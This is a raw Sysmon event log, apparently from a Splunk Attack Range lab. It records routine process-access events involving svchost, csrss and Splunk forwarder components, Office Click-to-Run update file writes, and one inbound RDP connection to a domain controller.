14:53:58.384{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049419Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049418Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049417Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049416Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049415Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049414Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049413Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049412Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB06-607E-D206-00000000BB01}2380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049411Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB06-607E-D206-00000000BB01}2380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049410Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.385{85C0FFC9-EB06-607E-D206-00000000BB01}2380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049409Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.259{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=229CD096E5DFA3176AE652E07FDE8D6C,SHA256=4AD716D80E9001DE2FF20F9C5600FC7F4E9480CD1A4B26A2E0A0B57238EF251B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.972{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ThirdPartyNotices.txt2021-04-20 14:53:59.972 11241100x800000000000000063619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.972{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSO.FRAMEPROTOCOLWIN32.DLL2021-04-20 14:53:59.972 11241100x800000000000000063618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.894{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.dll2021-04-20 14:53:59.894 11241100x800000000000000063617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.894{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CHAKRACORE.DLL2021-04-20 14:53:59.894 11241100x800000000000000063616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:59.894{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\Addons\OneDriveSetup.exe2021-04-20 14:53:59.894 11241100x800000000000000063615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.894{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Office.Interop.Excel.dll2021-04-20 14:53:59.878 11241100x800000000000000063614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL2021-04-20 14:53:59.878 11241100x800000000000000063613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AdeModule.dll2021-04-20 14:53:59.878 11241100x800000000000000063612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\sqmapi.dll2021-04-20 14:53:59.878 11241100x800000000000000063611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\PowerPivotExcelClientAddIn.dll2021-04-20 14:53:59.878 11241100x800000000000000063610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GKExcel.dll2021-04-20 14:53:59.878 11241100x800000000000000063609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\msipc.dll2021-04-20 14:53:59.862 11241100x800000000000000063608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOARIA.DLL2021-04-20 14:53:59.862 11241100x800000000000000063607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOCR.DLL2021-04-20 14:53:59.862 11241100x800000000000000063606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mce.dll2021-04-20 14:53:59.862 11241100x800000000000000063605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msfad.dll2021-04-20 14:53:59.862 11241100x800000000000000063604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoasb.exe2021-04-20 14:53:59.862 11241100x800000000000000063603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoadfsb.exe2021-04-20 14:53:59.862 11241100x800000000000000063602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\INTLDATE.DLL2021-04-20 14:53:59.862 11241100x800000000000000063601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCICONS.EXE2021-04-20 14:53:59.862 11241100x800000000000000063600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONENOTEIMP.DLL2021-04-20 14:53:59.862 11241100x800000000000000063599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\excelcnv.exe2021-04-20 14:53:59.862 11241100x800000000000000063598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CNFNOT32.EXE2021-04-20 14:53:59.862 11241100x800000000000000063597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:59.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VPREVIEW.EXE2021-04-20 14:53:59.862 354300x800000000000000063596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:57.780{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-14288-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000063595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\sqmapi_x64.dll2021-04-20 14:53:59.472 11241100x800000000000000063594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.WindowsAzure.StorageClient.dll2021-04-20 14:53:59.472 11241100x800000000000000063593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Windows.dll2021-04-20 14:53:59.472 11241100x800000000000000063592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Initialization.dll2021-04-20 14:53:59.472 11241100x800000000000000063591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Localytics.dll2021-04-20 14:53:59.472 11241100x800000000000000063590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\EventSource.dll2021-04-20 14:53:59.472 11241100x800000000000000063589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:59.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\DocumentFormat.OpenXml.dll2021-04-20 14:53:59.472 10341000x800000000000000063588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.347{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB07-607E-700B-00000000BB01}4272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 